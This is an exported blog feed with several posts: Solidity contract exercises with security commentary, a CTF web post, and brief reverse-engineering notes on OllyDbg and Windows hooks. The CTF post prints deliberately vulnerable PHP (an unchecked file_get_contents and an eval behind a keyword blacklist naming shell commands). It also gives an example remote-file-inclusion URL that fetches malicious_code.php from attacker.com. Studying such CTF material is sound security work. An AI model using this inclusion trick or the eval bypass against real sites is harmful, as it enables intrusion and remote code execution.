class="headerlink" title="简单计算器合约"></a>Simple calculator contract</h2><p>Task: implement a simple calculator contract that supports addition, subtraction, multiplication and division, as the functions add(uint256 a, uint256 b), subtract(uint256 a, uint256 b), multiply(uint256 a, uint256 b) and divide(uint256 a, uint256 b).</p><p>Hints:<br>• add(uint256 a, uint256 b): returns the sum of a and b.<br>• subtract(uint256 a, uint256 b): returns the difference of a and b.<br>• multiply(uint256 a, uint256 b): returns the product of a and b.<br>• divide(uint256 a, uint256 b): returns the quotient of a divided by b; b must be checked for zero.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleCalculator {<br>    <span class="hljs-comment">// Addition</span><br>    <span class="hljs-function">function <span class="hljs-title">add</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> a + b;<br>    }<br><br>    <span class="hljs-comment">// Subtraction; the check gives a clearer error than the 0.8 underflow panic</span><br>    <span class="hljs-function">function <span class="hljs-title">subtract</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-built_in">require</span>(a >= b, <span class="hljs-string">"Subtraction would result in a negative value"</span>);<br>        <span class="hljs-keyword">return</span> a - b;<br>    }<br><br>    <span class="hljs-comment">// Multiplication</span><br>    <span class="hljs-function">function <span class="hljs-title">multiply</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> a * b;<br>    }<br><br>    <span class="hljs-comment">// Division; b must be non-zero</span><br>    <span class="hljs-function">function <span class="hljs-title">divide</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-built_in">require</span>(b != <span class="hljs-number">0</span>, <span class="hljs-string">"Cannot divide by zero"</span>);<br>        <span class="hljs-keyword">return</span> a / b;<br>    }<br>}<br></code></pre></td></tr></table></figure><h2 id="存储合约"><a href="#存储合约" class="headerlink" title="存储合约"></a>Storage contract</h2><p>Task: create a contract that stores a single integer. Users set it through set(uint256 x) and read the current value through get().</p><p>Hints:<br>• set(uint256 x): sets the stored integer.<br>• get(): returns the currently stored integer.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleStorage {<br>    uint256 <span class="hljs-keyword">private</span> storedValue;<br><br>    <span class="hljs-comment">// Set the stored integer</span><br>    <span class="hljs-function">function <span class="hljs-title">set</span><span class="hljs-params">(uint256 x)</span> <span class="hljs-keyword">public</span> </span>{<br>        storedValue = x;<br>    }<br><br>    <span class="hljs-comment">// Return the currently stored integer</span><br>    <span class="hljs-function">function <span class="hljs-title">get</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> storedValue;<br>    }<br>}<br></code></pre></td></tr></table></figure><h2 id="简单身份验证合约"><a href="#简单身份验证合约" class="headerlink" title="简单身份验证合约"></a>Simple authentication contract</h2><p>Task: implement an authentication contract that lets users register and query their registration status. A user registers by calling register(); isRegistered(address user) reports whether an address has registered.</p><p>Hints:<br>• register(): the caller registers itself.<br>• isRegistered(address user): returns the registration status of the given address.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Authentication {<br>    <span class="hljs-built_in">mapping</span>(address => <span class="hljs-type">bool</span>) <span class="hljs-keyword">private</span> registeredUsers;<br><br>    <span class="hljs-comment">// Register: marks the caller's address as registered</span><br>    <span class="hljs-function">function <span class="hljs-title">register</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br>        <span class="hljs-built_in">require</span>(!registeredUsers[msg.sender], <span class="hljs-string">"User is already registered"</span>);<br>        registeredUsers[msg.sender] = <span class="hljs-literal">true</span>;<br>    }<br><br>    <span class="hljs-comment">// Query: returns whether the given address has registered</span><br>    <span class="hljs-function">function <span class="hljs-title">isRegistered</span><span class="hljs-params">(address user)</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(<span class="hljs-type">bool</span>)</span> </span>{<br>        <span class="hljs-keyword">return</span> registeredUsers[user];<br>    }<br>}<br></code></pre></td></tr></table></figure><p>Note what this does and does not prove: registration is keyed on msg.sender, so the only thing isRegistered attests is that someone controlling that key once called register(). There is no credential, no admin, and nothing stops any address from registering.</p><h2 id="简单拍卖合约"><a href="#简单拍卖合约" class="headerlink" title="简单拍卖合约"></a>Simple auction contract</h2><p>Task: create a simple auction contract that lets users place bids. Implement bid() to submit a bid and getHighestBid() to query the current highest bid.<br>Hints:<br>• bid(): submits a bid; it must be higher than the current highest bid.<br>• getHighestBid(): returns the current highest bid.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleAuction {<br>    address <span class="hljs-keyword">public</span> highestBidder;<br>    uint256 <span class="hljs-keyword">public</span> highestBid;<br><br>    <span class="hljs-comment">// Place a bid; it must exceed the current highest bid</span><br>    <span class="hljs-function">function <span class="hljs-title">bid</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br>        <span class="hljs-built_in">require</span>(msg.value > highestBid, <span class="hljs-string">"Bid must be higher than the current highest bid"</span>);<br><br>        <span class="hljs-comment">// Refund the previous highest bidder, if there is one</span><br>        <span class="hljs-keyword">if</span> (highestBidder != <span class="hljs-built_in">address</span>(<span class="hljs-number">0</span>)) {<br>            <span class="hljs-built_in">payable</span>(highestBidder).<span class="hljs-built_in">transfer</span>(highestBid);<br>        }<br><br>        <span class="hljs-comment">// Record the new highest bidder and bid</span><br>        highestBidder = msg.sender;<br>        highestBid = msg.value;<br>    }<br><br>    <span class="hljs-comment">// Query the current highest bid</span><br>    <span class="hljs-function">function <span class="hljs-title">getHighestBid</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> highestBid;<br>    }<br>}<br></code></pre></td></tr></table></figure><p>Refunding the previous leader from inside bid() is the classic push-payment denial of service: if highestBidder is a contract whose receive() reverts, or needs more than the 2300 gas that transfer forwards, the refund reverts, bid() reverts with it, and nobody can ever outbid that address. The auction is frozen with its ether inside. The safe pattern is pull payments: credit the outbid amount to a pendingReturns mapping and let each loser withdraw it in a separate transaction, so a refund that fails only hurts the address that refuses it.</p><h2 id="简单奖励合约"><a href="#简单奖励合约" class="headerlink" title="简单奖励合约"></a>Simple rewards contract</h2><p>Task: create a contract that lets users deposit ether and rewards them in proportion to the amount. Implement deposit() for deposits and getReward() to query the reward.</p><p>Hints:<br>• deposit(): deposit ether; the contract grants a 10% reward.<br>• getReward(): query the caller's current reward.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract DepositRewards {<br>    <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">private</span> deposits;<br>    <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">private</span> rewards;<br><br>    <span class="hljs-comment">// Deposit ether; the depositor is credited a 10% reward</span><br>    <span class="hljs-function">function <span class="hljs-title">deposit</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br>        <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Deposit amount must be greater than zero"</span>);<br><br>        <span class="hljs-comment">// Record the deposit</span><br>        deposits[msg.sender] += msg.value;<br><br>        <span class="hljs-comment">// Compute the reward and credit it</span><br>        uint256 reward = (msg.value * <span class="hljs-number">10</span>) / <span class="hljs-number">100</span>;<br>        rewards[msg.sender] += reward;<br>    }<br><br>    <span class="hljs-comment">// Query the caller's reward</span><br>    <span class="hljs-function">function <span class="hljs-title">getReward</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> rewards[msg.sender];<br>    }<br>}<br></code></pre></td></tr></table></figure><p>The reward here is bookkeeping only: the contract holds exactly the ether that was deposited, has no function that pays rewards or deposits back out, and nothing funds the extra 10%. Before adding a withdraw function, decide where the reward ether comes from; otherwise early withdrawers are paid from later depositors' principal.</p><h2 id="投票合约"><a href="#投票合约" class="headerlink" title="投票合约"></a>Voting contract</h2><p>Task: create a voting contract that lets users register candidates and vote for them. Implement addCandidate(string memory name) and vote(uint candidateId).</p><p>Hints:<br>• addCandidate(string memory name): adds a new candidate.<br>• vote(uint candidateId): casts a vote for the given candidate.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Voting {<br>    <span class="hljs-keyword">struct</span> <span class="hljs-title class_">Candidate</span> {<br>        string name;<br>        uint256 voteCount;<br>    }<br><br>    Candidate[] <span class="hljs-keyword">public</span> candidates;<br>    <span class="hljs-built_in">mapping</span>(address => <span class="hljs-type">bool</span>) <span class="hljs-keyword">private</span> hasVoted;<br><br>    <span class="hljs-comment">// Add a candidate</span><br>    <span class="hljs-function">function <span class="hljs-title">addCandidate</span><span class="hljs-params">(string memory name)</span> <span class="hljs-keyword">public</span> </span>{<br>        candidates.<span class="hljs-built_in">push</span>(<span class="hljs-built_in">Candidate</span>(name, <span class="hljs-number">0</span>));<br>    }<br><br>    <span class="hljs-comment">// Vote for the given candidate</span><br>    <span class="hljs-function">function <span class="hljs-title">vote</span><span class="hljs-params">(uint256 candidateId)</span> <span class="hljs-keyword">public</span> </span>{<br>        <span class="hljs-built_in">require</span>(candidateId < candidates.length, <span class="hljs-string">"Invalid candidate ID"</span>);<br>        <span class="hljs-built_in">require</span>(!hasVoted[msg.sender], <span class="hljs-string">"You have already voted"</span>);<br><br>        <span class="hljs-comment">// Increment the candidate's vote count</span><br>        candidates[candidateId].voteCount += <span class="hljs-number">1</span>;<br><br>        <span class="hljs-comment">// Mark the caller as having voted</span><br>        hasVoted[msg.sender] = <span class="hljs-literal">true</span>;<br>    }<br><br>    <span class="hljs-comment">// Number of candidates</span><br>    <span class="hljs-function">function <span class="hljs-title">getCandidateCount</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> candidates.length;<br>    }<br><br>    <span class="hljs-comment">// Name and vote count of a candidate</span><br>    <span class="hljs-function">function <span class="hljs-title">getCandidate</span><span class="hljs-params">(uint256 candidateId)</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(string memory, uint256)</span> </span>{<br>        <span class="hljs-built_in">require</span>(candidateId < candidates.length, <span class="hljs-string">"Invalid candidate ID"</span>);<br>        <span class="hljs-keyword">return</span> (candidates[candidateId].name, candidates[candidateId].voteCount);<br>    }<br>}<br></code></pre></td></tr></table></figure><p>As the task specifies, addCandidate has no access control, so any address can add any number of candidates, and the one-vote rule is enforced per address, so anyone with several accounts has several votes. Both are fine for an exercise; a real election needs an admin or a registration phase for candidates and a voter allow-list or token-weighted voting.</p><h2 id="众筹合约"><a href="#众筹合约" class="headerlink" title="众筹合约"></a>Crowdfunding contract</h2><p>Task: create a crowdfunding contract that lets users contribute and lets the funds be withdrawn once the goal is reached. Implement contribute() and withdraw().</p><p>Hints:<br>• contribute(): lets users contribute and records the amount.<br>• withdraw(): lets the funds be withdrawn once the goal is reached.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Crowdfunding {<br>    address <span class="hljs-keyword">public</span> owner;<br>    uint256 <span class="hljs-keyword">public</span> goal;<br>    uint256 <span class="hljs-keyword">public</span> totalContributions;<br>    <span class="hljs-type">bool</span> <span class="hljs-keyword">public</span> goalReached;<br><br>    <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">public</span> contributions;<br><br>    <span class="hljs-built_in">constructor</span>(uint256 _goal) {<br>        owner = msg.sender;<br>        goal = _goal;<br>        goalReached = <span class="hljs-literal">false</span>;<br>    }<br><br>    <span class="hljs-comment">// Contribute; records the caller's contribution</span><br>    <span class="hljs-function">function <span class="hljs-title">contribute</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br>        <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Contribution must be greater than zero"</span>);<br>        <span class="hljs-built_in">require</span>(!goalReached, <span class="hljs-string">"Goal already reached"</span>);<br><br>        contributions[msg.sender] += msg.value;<br>        totalContributions += msg.value;<br><br>        <span class="hljs-comment">// Mark the goal as reached once total contributions meet or exceed it</span><br>        <span class="hljs-keyword">if</span> (totalContributions >= goal) {<br>            goalReached = <span class="hljs-literal">true</span>;<br>        }<br>    }<br><br>    <span class="hljs-comment">// Withdraw; only the owner, and only once the goal is reached</span><br>    <span class="hljs-function">function <span class="hljs-title">withdraw</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br>        <span class="hljs-built_in">require</span>(msg.sender == owner, <span class="hljs-string">"Only the owner can withdraw funds"</span>);<br>        <span class="hljs-built_in">require</span>(goalReached, <span class="hljs-string">"Funding goal not reached"</span>);<br><br>        <span class="hljs-built_in">payable</span>(owner).<span class="hljs-built_in">transfer</span>(<span class="hljs-built_in">address</span>(<span class="hljs-keyword">this</span>).balance);<br>    }<br><br>    <span class="hljs-comment">// Query a contributor's total</span><br>    <span class="hljs-function">function <span class="hljs-title">getContribution</span><span class="hljs-params">(address contributor)</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> contributions[contributor];<br>    }<br>}<br></code></pre></td></tr></table></figure><p>There is no deadline and no refund path: if the goal is never reached, every contribution stays locked in the contract forever. A usable version fixes a deadline at deployment, lets anyone finalize the campaign after it, and gives contributors a claimRefund() when it fails.</p><h2 id="资产管理合约"><a href="#资产管理合约" class="headerlink" title="资产管理合约"></a>Asset management contract</h2><p>Task: develop a contract that lets users deposit, withdraw and check their balance. Implement deposit(), withdraw(uint amount) and getBalance().</p><p>Hints:<br>• deposit(): deposit ether.<br>• withdraw(uint amount): withdraw the given amount.<br>• getBalance(): query the current balance.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleBank {<br>    <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">private</span> balances;<br><br>    <span class="hljs-comment">// Deposit; credits the sent ether to the caller's account</span><br>    <span class="hljs-function">function <span class="hljs-title">deposit</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br>        <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Deposit amount must be greater than zero"</span>);<br>        balances[msg.sender] += msg.value;<br>    }<br><br>    <span class="hljs-comment">// Withdraw the given amount of ether</span><br>    <span class="hljs-function">function <span class="hljs-title">withdraw</span><span class="hljs-params">(uint256 amount)</span> <span class="hljs-keyword">public</span> </span>{<br>        <span class="hljs-built_in">require</span>(amount > <span class="hljs-number">0</span>, <span class="hljs-string">"Withdrawal amount must be greater than zero"</span>);<br>        <span class="hljs-built_in">require</span>(balances[msg.sender] >= amount, <span class="hljs-string">"Insufficient balance"</span>);<br><br>        <span class="hljs-comment">// Update the balance before sending (checks-effects-interactions)</span><br>        balances[msg.sender] -= amount;<br>        <span class="hljs-built_in">payable</span>(msg.sender).<span class="hljs-built_in">transfer</span>(amount);<br>    }<br><br>    <span class="hljs-comment">// Query the caller's balance</span><br>    <span class="hljs-function">function <span class="hljs-title">getBalance</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> balances[msg.sender];<br>    }<br>}<br></code></pre></td></tr></table></figure><p>withdraw follows checks-effects-interactions: the balance is decremented before the ether leaves, so a contract that re-enters withdraw from its receive() fails the balance check instead of draining the bank. Keep that order if transfer is ever replaced by call, which forwards all remaining gas.</p><h2 id="合约升级示例"><a href="#合约升级示例" class="headerlink" title="合约升级示例"></a>Contract upgrade example</h2><p>Task: create an upgradeable contract. The initial contract implements setValue(uint value) and getValue(); the upgraded contract adds incrementValue().</p><p>Hints:<br>• setValue(uint value): sets a value.<br>• getValue(): returns the current value.<br>• incrementValue(): adds one to the current value (implemented in the upgraded contract).</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br><span class="hljs-comment">// Proxy contract for the upgradeable contract</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Proxy {<br>    address <span class="hljs-keyword">public</span> implementation;<br><br>    <span class="hljs-built_in">constructor</span>(address _implementation) {<br>        implementation = _implementation;<br>    }<br><br>    <span class="hljs-function">function <span class="hljs-title">upgradeTo</span><span class="hljs-params">(address _implementation)</span> <span class="hljs-keyword">public</span> </span>{<br>        implementation = _implementation;<br>    }<br><br>    <span class="hljs-built_in">fallback</span>() external {<br>        address impl = implementation;<br>        <span class="hljs-built_in">require</span>(impl != <span class="hljs-built_in">address</span>(<span class="hljs-number">0</span>), <span class="hljs-string">"Implementation not set"</span>);<br>        <span class="hljs-comment">// Forward the call to the implementation, running its code against this contract's storage</span><br>        assembly {<br>            <span class="hljs-built_in">calldatacopy</span>(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-built_in">calldatasize</span>())<br>            let result := <span class="hljs-built_in">delegatecall</span>(<span class="hljs-built_in">gas</span>(), impl, <span class="hljs-number">0</span>, <span class="hljs-built_in">calldatasize</span>(), <span class="hljs-number">0</span>, <span class="hljs-number">0</span>)<br>            let size := <span class="hljs-built_in">returndatasize</span>()<br>            <span class="hljs-built_in">returndatacopy</span>(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, size)<br>            <span class="hljs-keyword">switch</span> result<br>            <span class="hljs-keyword">case</span> <span class="hljs-number">0</span> { <span class="hljs-built_in">revert</span>(<span class="hljs-number">0</span>, size) }<br>            <span class="hljs-keyword">default</span> { <span class="hljs-built_in">return</span>(<span class="hljs-number">0</span>, size) }<br>        }<br>    }<br>}<br><br><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br><span class="hljs-comment">// Initial contract</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Initial {<br>    <span class="hljs-comment">// internal rather than private, otherwise the upgraded contract cannot access it</span><br>    uint256 <span class="hljs-keyword">internal</span> value;<br><br>    <span class="hljs-function">function <span class="hljs-title">setValue</span><span class="hljs-params">(uint256 _value)</span> <span class="hljs-keyword">public</span> </span>{<br>        value = _value;<br>    }<br><br>    <span class="hljs-function">function <span class="hljs-title">getValue</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br>        <span class="hljs-keyword">return</span> value;<br>    }<br>}<br><br><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br><span class="hljs-comment">// Upgraded contract</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br><span class="hljs-keyword">import</span> <span class="hljs-string">"./Initial.sol"</span>;<br><br>contract Upgraded is Initial {<br>    <span class="hljs-function">function <span class="hljs-title">incrementValue</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br>        value += <span class="hljs-number">1</span>;<br>    }<br>}<br></code></pre></td></tr></table></figure><p>The three SPDX/pragma headers mark three source files (the import shows that Initial lives in Initial.sol). Upgraded inheriting from Initial is the right way to extend an implementation: existing variables keep their storage slots and new ones are only appended. Two defects are worth knowing about before copying the proxy itself. First, upgradeTo has no access control, so anyone can point the proxy at their own contract and take over everything it holds. Second, the proxy keeps implementation in storage slot 0 and Initial keeps value in slot 0 as well; because delegatecall runs the implementation against the proxy's storage, the first setValue(x) made through the proxy overwrites the implementation address with x, after which every call is delegated to an address with no code and silently succeeds with empty return data. EIP-1967 avoids the collision by storing the implementation pointer in a fixed pseudo-random slot, keccak256("eip1967.proxy.implementation") - 1, that no ordinary state variable will occupy.</p><h2 id="时间锁合约"><a href="#时间锁合约" class="headerlink" title="时间锁合约"></a>Time lock contract</h2><p>Task: implement a time-lock contract that lets users deposit funds and set a lock period. Implement deposit(uint unlockTime) and withdraw().</p><p>Hints:<br>• deposit(uint unlockTime): deposit ether and set the unlock time.<br>• withdraw(): withdraw the funds after they unlock.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract TimeLock {<br>    <span class="hljs-keyword">struct</span> <span class="hljs-title class_">Deposit</span> {<br>        uint256 amount;<br>        uint256 unlockTime;<br>    }<br><br>    <span class="hljs-built_in">mapping</span>(address => Deposit) <span class="hljs-keyword">private</span> deposits;<br><br>    <span class="hljs-comment">// Deposit ether and set the unlock time</span><br>    <span class="hljs-function">function <span class="hljs-title">deposit</span><span class="hljs-params">(uint256 unlockTime)</span> <span class="hljs-keyword">public</span> payable </span>{<br>        <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Deposit amount must be greater than zero"</span>);<br>        <span class="hljs-built_in">require</span>(unlockTime > block.timestamp, <span class="hljs-string">"Unlock time must be in the future"</span>);<br>        <span class="hljs-comment">// A new deposit may extend the lock on the whole balance but never shorten it</span><br>        <span class="hljs-built_in">require</span>(unlockTime >= deposits[msg.sender].unlockTime, <span class="hljs-string">"Cannot shorten an existing lock"</span>);<br><br>        <span class="hljs-comment">// Update the caller's deposit record</span><br>        deposits[msg.sender].amount += msg.value;<br>        deposits[msg.sender].unlockTime = unlockTime;<br>    }<br><br>    <span class="hljs-comment">// Withdraw; only allowed once the unlock time has passed</span><br>    <span class="hljs-function">function <span class="hljs-title">withdraw</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br>        Deposit storage userDeposit = deposits[msg.sender];<br>        <span class="hljs-built_in">require</span>(block.timestamp >= userDeposit.unlockTime, <span class="hljs-string">"Funds are still locked"</span>);<br>        <span class="hljs-built_in">require</span>(userDeposit.amount > <span class="hljs-number">0</span>, <span class="hljs-string">"No funds to withdraw"</span>);<br><br>        uint256 amountToWithdraw = userDeposit.amount;<br>        userDeposit.amount = <span class="hljs-number">0</span>; <span class="hljs-comment">// Zero the balance before sending, against re-entrancy</span><br><br>        <span class="hljs-built_in">payable</span>(msg.sender).<span class="hljs-built_in">transfer</span>(amountToWithdraw);<br>    }<br><br>    <span class="hljs-comment">// Query the caller's deposit</span><br>    <span class="hljs-function">function <span class="hljs-title">getDepositInfo</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256 amount, uint256 unlockTime)</span> </span>{<br>        Deposit storage userDeposit = deposits[msg.sender];<br>        <span class="hljs-keyword">return</span> (userDeposit.amount, userDeposit.unlockTime);<br>    }<br>}<br></code></pre></td></tr></table></figure><p>The check of unlockTime against the stored value matters because a second deposit overwrites the unlock time for the whole balance: without it, a user who locked 10 ether for a year could deposit 1 wei with an unlock time a minute away and withdraw everything at once. block.timestamp is chosen by the block producer and can be skewed by a few seconds, which is harmless for locks measured in hours or longer.</p>]]></content>
<categories>
<category>web3</category>
</categories>
<tags>
<tag>course</tag>
</tags>
</entry>
<entry>
<title>NSSCTFweb2</title>
<link href="/2024/10/19/NSSCTFweb2/"/>
<url>/2024/10/19/NSSCTFweb2/</url>
<content type="html"><![CDATA[<p>The future</p><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><?php<br>highlight_file(__FILE__);<br>error_reporting(0);<br>$file = $_REQUEST['file'];<br>$data = file_get_contents($file);<br>echo "File contents: $data";<br>// Plain and simple, use it as-is<br>File contents: <br></code></pre></td></tr></table></figure><p>A simple file inclusion vulnerability (FIV)<br>Local file inclusion (LFI)<br>A potential remote file inclusion (RFI) vulnerability<br>If allow_url_fopen and allow_url_include are set to On in the PHP configuration, an attacker can even pull in a remote file through the file parameter and execute remote malicious code. With such a misconfiguration, remote file inclusion can be performed through a URL like:<br><a href="http://example.com/vulnerable.php?file=http://attacker.com/malicious_code.php">http://example.com/vulnerable.php?file=http://attacker.com/malicious_code.php</a></p><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><?php<br>highlight_file(__FILE__);<br>if(isset($_GET['code'])){<br>    $code=$_GET['code'];<br>    if (!preg_match('/sys|pas|read|file|ls|cat|tac| |head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){<br>        eval($code);<br>        echo '<br>';<br>        echo '<img src="./dududadadudu.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 20%; height: auto;">';<br>        echo '<audio controls>';echo '<source src="./dududadudada.mp3" type="audio/mpeg">';<br>    } else {<br>        echo '<img src="./redhot.jpg" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">';<br>        die("这都不能bypass?不准你玩cod");<br>    }<br>} else {<br>    echo "喜欢用轮椅枪是吧,账号给你ban了!";<br>    echo '<img src="./ban.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">';<br>}<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>Button events</title>
<link href="/2024/10/18/%E6%8C%89%E9%92%AE%E4%BA%8B%E4%BB%B6/"/>
<url>/2024/10/18/%E6%8C%89%E9%92%AE%E4%BA%8B%E4%BB%B6/</url>
<content type="html"><![CDATA[<p>When reverse engineering, we commonly run into a popup dialog but cannot find the string that would let us locate the relevant spot. In that case we can use the button event to reach the corresponding input breakpoint.<br><img src="https://gitee.com/fogpost/photo/raw/master/202410181444105.png"><br>In this screenshot, after entering the number we do not click Login; instead we search for the binary string in OD (OllyDbg), as shown below.<br><img src="https://gitee.com/fogpost/photo/raw/master/202410181449498.png"><br>We then arrive here; this breakpoint is the button-event breakpoint of an Easy Language (易语言) program.<br><img src="https://gitee.com/fogpost/photo/raw/master/202410181450283.png"></p>]]></content>
<categories>
<category>Reverse engineering</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>Hook</title>
<link href="/2024/10/16/Hook/"/>
<url>/2024/10/16/Hook/</url>
<content type="html"><![CDATA[<h1 id="Hook"><a href="#Hook" class="headerlink" title="Hook"></a>Hook</h1><h2 id="原理"><a href="#原理" class="headerlink" title="Principle"></a>Principle</h2><p>Hooking is a technique that lets one program monitor and modify the execution of another. It is commonly used for debugging, changing program behaviour, and protecting programs.</p><p>On Windows, hooks fall mainly into the following kinds: keyboard hooks, mouse hooks, message hooks, and API hooks.</p><h2 id="介绍"><a href="#介绍" class="headerlink" title="Introduction"></a>Introduction</h2><p>SetWindowsHookExA is the Windows API function for installing a hook. It can be used to monitor and modify the keyboard, mouse, and message events of other programs.</p><p>The prototype of SetWindowsHookExA is:</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">HHOOK SetWindowsHookExA(<br>    int       idHook,<br>    HOOKPROC  lpfn,<br>    HINSTANCE hmod,<br>    DWORD     dwThreadId<br>);<br></code></pre></td></tr></table></figure><h3 id="键盘消息钩取练习"><a href="#键盘消息钩取练习" class="headerlink" title="Keyboard message hooking exercise"></a>Keyboard message hooking exercise</h3>]]></content>
<categories>
<category>Reverse engineering</category>
</categories>
<tags>
<tag>DLL</tag>
</tags>
</entry>
<entry>
<title>wuai Lesson 8</title>
<link href="/2024/10/15/wuai%E7%AC%AC%E5%85%AB%E8%AF%BE/"/>
<url>/2024/10/15/wuai%E7%AC%AC%E5%85%AB%E8%AF%BE/</url>
